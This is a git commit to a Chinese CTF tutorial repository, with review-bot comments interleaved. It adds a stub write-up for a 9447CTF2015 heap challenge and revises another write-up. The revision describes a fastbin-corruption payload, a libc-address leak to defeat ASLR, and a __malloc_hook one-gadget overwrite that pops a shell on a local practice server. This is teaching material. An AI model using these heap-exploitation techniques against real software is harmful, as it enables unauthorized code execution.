add 6.1.11

firmianay 2018-01-10 20:55:34 +08:00
parent dc10687bc8
commit 7dc80c9097
6 changed files with 32 additions and 6 deletions


@ -111,6 +111,7 @@
- [6.1.8 pwn DCTF2017 Flex](doc/6.1.8_pwn_dctf2017_flex.md)
- [6.1.9 pwn RHme3 Exploitation](doc/6.1.9_rhme3_exploitation.md)
- [6.1.10 pwn 0CTF2017 BabyHeap2017](doc/6.1.10_0ctf2017_babyheap2017.md)
- [6.1.11 pwn 9447CTF2015 Search-Engine](doc/6.1.11_9447ctf2015_search_engine.md)
- re
- [6.2.1 re XHPCTF2017 dont_panic](doc/6.2.1_re_xhpctf2017_dont_panic.md)
- [6.2.2 re ECTF2016 tayy](doc/6.2.2_re_ectf2016_tayy.md)


@ -99,6 +99,7 @@ GitHub 地址https://github.com/firmianay/CTF-All-In-One
* [6.1.8 pwn DCTF2017 Flex](doc/6.1.8_pwn_dctf2017_flex.md)
* [6.1.9 pwn RHme3 Exploitation](doc/6.1.9_rhme3_exploitation.md)
* [6.1.10 pwn 0CTF2017 BabyHeap2017](doc/6.1.10_0ctf2017_babyheap2017.md)
* [6.1.11 pwn 9447CTF2015 Search-Engine](doc/6.1.11_9447ctf2015_search_engine.md)
* re
* [6.2.1 re XHPCTF2017 dont_panic](doc/6.2.1_re_xhpctf2017_dont_panic.md)
* [6.2.2 re ECTF2016 tayy](doc/6.2.2_re_ectf2016_tayy.md)


@ -177,7 +177,7 @@ gef➤ x/20gx 0xafc966564d0-0x10
```
free 掉的 chunk其结构体被清空等待下一次 malloc并添加到空出来的地方。
通过溢出漏洞修改已被释放的 chunk 2让 fd 指针指向 chunk 4这样就将 small chunk 加入到了 fastbins 链表中,然后还需要把 chunk 4 的 0x91 改成 0x21 以绕过 fastbins 的检查:
通过溢出漏洞修改已被释放的 chunk 2让 fd 指针指向 chunk 4这样就将 small chunk 加入到了 fastbins 链表中,然后还需要把 chunk 4 的 0x91 改成 0x21 以绕过 fastbins 大小的检查:
```python
payload = "A"*16
payload += p64(0)
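Review bot: the reworded sentence (0x91 changed to 0x21 to pass the fastbins size check) still does not say why 0x21 is the value that works; add one clause stating that the size field has to fall in the same fastbin size class as the chunk being handed out, since malloc checks the size of the chunk it pulls from the list against the bin it came from, and that the low bit stays set because it is the prev_inuse flag, not part of the size. It would also help to say which line of the `x/20gx` dump above is chunk 4's size field, so the reader can match the 0x91 they see in the dump to the value being overwritten in the payload that follows.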
@ -526,16 +526,16 @@ gef➤ x/30gx 0xafc966564d0-0x10
0xafc966565a0: 0x0000000000000000 0x0000000000000000
```
最后,只要调用了 malloc就会触发 hook 函数,即 one-gadget。
最后,只要调用了 malloc就会触发 hook 函数,即 one-gadget。现在可以开启 ASLR 了,因为通过泄漏 libc 地址,我们已经完全绕过了它。
Bingo!!!
```
$ python exp.py
[+] Opening connection to 127.0.0.1 on port 10001: Done
[*] leak => 0x7ffff7dd1b78
[*] libc => 0x7ffff7a0d000
[*] __malloc_hook => 0x7ffff7dd1b10
[*] one_gadget => 0x7ffff7a5226a
[*] leak => 0x7f8c1be9eb78
[*] libc => 0x7f8c1bada000
[*] __malloc_hook => 0x7f8c1be9eb10
[*] one_gadget => 0x7f8c1bb1f26a
[*] Switching to interactive mode
$ whoami
firmy
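Review bot: the added sentence (现在可以开启 ASLR 了 ... 我们已经完全绕过了它) claims ASLR is now fully bypassed, but the only evidence in the hunk is the swapped run output, where the leaked addresses move from the 0x7ffff7... range to 0x7f8c1b...; say explicitly that the old transcript was captured with ASLR disabled and the new one with it re-enabled, and show the command used to turn it back on, otherwise the changed addresses read as an unexplained edit. Also narrow "completely bypassed" to what the leak actually covers: the libc base (and everything derived from it, `__malloc_hook` and the one-gadget address), which is exactly the set of values the output prints.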


@ -0,0 +1,23 @@
# 6.1.11 pwn 9447CTF2015 Search-Engine
- [题目复现](#题目复现)
- [题目解析](#题目解析)
- [参考资料](#参考资料)
[下载文件](../src/writeup/6.1.11_9447ctf2015_search_engine)
## 题目复现
```
$ file search
search: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4f5b70085d957097e91f940f98c0d4cc6fb3343f, stripped
$ checksec -f search
RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH Yes 1 3 search
```
## 题目解析
## 参考资料
- [how2heap](https://github.com/shellphish/how2heap)
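Review bot: the new write-up ships with an empty 题目解析 section (nothing between the two `##` headings after the checksec block), so the three TOC entries added in this commit point to a stub; either add the analysis in the same commit or mark the page as work in progress in the TOC. When the analysis is written, the checksec line already lists the mitigations to discuss (Partial RELRO, stack canary, NX, No PIE, FORTIFY with 1 of 3 fortifiable calls fortified), so the reader can see which protections are in play before the heap discussion starts. 参考资料 currently lists only how2heap with no hint of which technique from it applies; a one-line pointer to the relevant how2heap example would make the reference useful.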


@ -11,6 +11,7 @@
- [6.1.8 pwn DCTF2017 Flex](6.1.8_pwn_dctf2017_flex.md)
- [6.1.9 pwn RHme3 Exploitation](6.1.9_rhme3_exploitation.md)
- [6.1.10 pwn 0CTF2017 BabyHeap2017](6.1.10_0ctf2017_babyheap2017.md)
- [6.1.11 pwn 9447CTF2015 Search-Engine](6.1.11_9447ctf2015_search_engine.md)
- re
- [6.2.1 re XHPCTF2017 dont_panic](6.2.1_re_xhpctf2017_dont_panic.md)
- [6.2.2 re ECTF2016 tayy](6.2.2_re_ectf2016_tayy.md)
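Review bot: this is the third hand-edited copy of the same table of contents touched in one commit (the two hunks at the top of the diff add the identical 6.1.11 entry, once with a `doc/` prefix and once without); consider generating these lists from a single source, or at least adding a simple check that the three lists stay in sync, since a future entry added to only one of them will silently leave the others stale.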

Binary file not shown.